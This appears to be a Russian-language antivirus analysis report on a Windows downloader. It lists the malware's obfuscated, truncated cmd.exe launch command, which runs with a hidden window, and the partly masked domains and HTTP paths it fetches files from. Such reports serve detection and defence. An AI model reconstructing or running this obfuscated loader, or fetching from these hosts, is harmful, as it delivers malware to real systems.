Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set MWI=UMcORrQZKuzabszPZNVsqwIEDCEkYm}L'X\jh4gBApG+W.:dlxt\,3F@{-58 $e;S9iy()=0vfnHJo&&for %W in (61;35;64;9;70;32;25;27;5;32;63;61;66;33;47;70;74;...
Сетевая активность
Подключается к
- 'we###mail.co.uk':80
- 've###nins.com':80
- 'us##sp.com':80
- 'vi####ercenary.com':80
- 'vi###sgarden.at':80
TCP
Запросы HTTP GET
- http://we###mail.co.uk/zPZAdQ5B
- http://ve###nins.com/vpdpLgH9
- http://us##sp.com/sVy
- http://vi####ercenary.com/F
- http://vi####ercenary.com/F/
- http://vi###sgarden.at/phpMyBackupPro/export/8
UDP
- DNS ASK we###mail.co.uk
- DNS ASK ve###nins.com
- DNS ASK us##sp.com
- DNS ASK vi####ercenary.com
- DNS ASK vi###sgarden.at
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set MWI=UMcORrQZKuzabszPZNVsqwIEDCEkYm}L'X\jh4gBApG+W.:dlxt\,3F@{-58 $e;S9iy()=0vfnHJo&&for %W in (61;35;64;9;70;32;25;27;5;32;63;61;66;33;47;70;74;...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set MWI=UMcORrQZKuzabszPZNVsqwIEDCEkYm}L'X\jh4gBApG+W.:dlxt/,3F@{-58 $e;S9iy()=0vfnHJo&&for %W in (61;35;64;9;70;32;25;27;5;32;63;61;66;33;47;70;74;62;21;57;77;12;35;62;2;50;60;17;62;50;45...
